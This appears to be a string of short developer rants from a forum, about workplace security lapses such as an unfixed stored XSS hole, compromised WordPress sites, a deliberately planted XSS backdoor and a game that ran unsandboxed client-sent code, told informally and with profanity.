The windows/microsoft fanboy I've ranted about multiple times.

- wouldn't use anything except for windows. Even if required for a project (I would if really needed, have done that a few times already)
- refused to use any framework/language not written by Microsoft
- tried to get other projects to use windows/.net when it wasn't required and it was only linux/php guys (and that fit the projects perfectly)
- ONLY wanted to use Skype and whatsapp. Always bragged about how he had 10gb of Skype history.
- didn't want to use anything related to linus torvalds or open source because 'those are open source and have no business model so they're bad'

And then: he suggested the use of windows server right after one was hacked (windows vuln that wasn't patched yet) which caused the devops guys to want to install a new Linux server for it.
Even the windows sysadmin pointed to the door when he said that and gave him a huge 'GTFO' face cD

Yeah, fuck him.

a stored XSS vuln in a banner-like component, visible in ALL the pages in the portal. Anyone can attack anyone.

HOWEVER this was not discovered by 3rd-party security specialists during latest security audit. I have escalated this to my manager and got replied that unless client actively requests this to be fixed should I do anything about it.

FFS.. it's only 2 lines of code.. And there's nothing I can do about it.

Eventualy I was transfered to another project. Now it's not my problem anymore.

Just found out some of our smaller sites (wp) have been hit with a shell...
In fucking January.

My colleagues didn't think to tell me this.

They figured someone must have had the pass or something and started posting about Viagra...

No. It's the fucking ico vuln...

I hate work right now.

Back at <biginternationalorg> I witnessed a developer deliberately build an xss vuln into a company web application, so that he could plug a JS file in with all of his passwords hardcoded. Bear in mind, this is an org that provides services to both the UK and US military, and if you have access to some stuff you have access to the tools you need to impersonate high-ranking military folks.

I know its like, twenty different passwords, but that's what a goddamn keychain is for! If you don't trust windows keychains, do what I did and run a VM with a Foss keychain installed! Don't build a vuln right into a public facing web app, that's just stupidity.

Discord apparently has a new vuln allowing bot accounts to become normal accounts without regenerating the token. Explains all the thotbots and shit appearing.

my old game had this flow every time a client places an object:

Client A creates a new generic object, and attaches texture paths (yep, global paths are allowed), and... lua code as strings to it.
Client A sends the entire object list to the server
Server receives it, replaces it's own object list
Server copies the entire object list and sends it to all clients
Client A and Client B both receive the object list and replace their versions.
All clients see that the object contains some code as strings
They compile and store it, and then run every frame. UNSANDBOXED.

any client could make all other ones execute any code and i was proud of my idea!

So we having a heated debate about MS decision on introducing ads on me menu

So was saying this can be a potential critical vuln as always... its kind of like MS tread Mark now :-C
My reasoning was now ads will have direct access to pc memory since they are being delivered straight to your pc

and this other guy went on to say they are being delivered to your machine they are being delivered to explore...... and I was like WTF?? isnt explore a process running directly on your machine??